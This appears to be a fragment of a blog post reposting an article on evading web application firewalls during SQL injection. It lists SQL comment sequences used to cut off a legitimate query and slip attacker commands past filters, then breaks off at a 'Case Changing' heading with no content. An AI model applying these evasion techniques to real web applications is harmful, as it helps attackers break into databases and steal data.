Great article, the source is in the bottom of this post.
1)Comments: SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:
//, — , /**/, #, –+, — -, ;
2)Case Changing:
No comments:
Post a Comment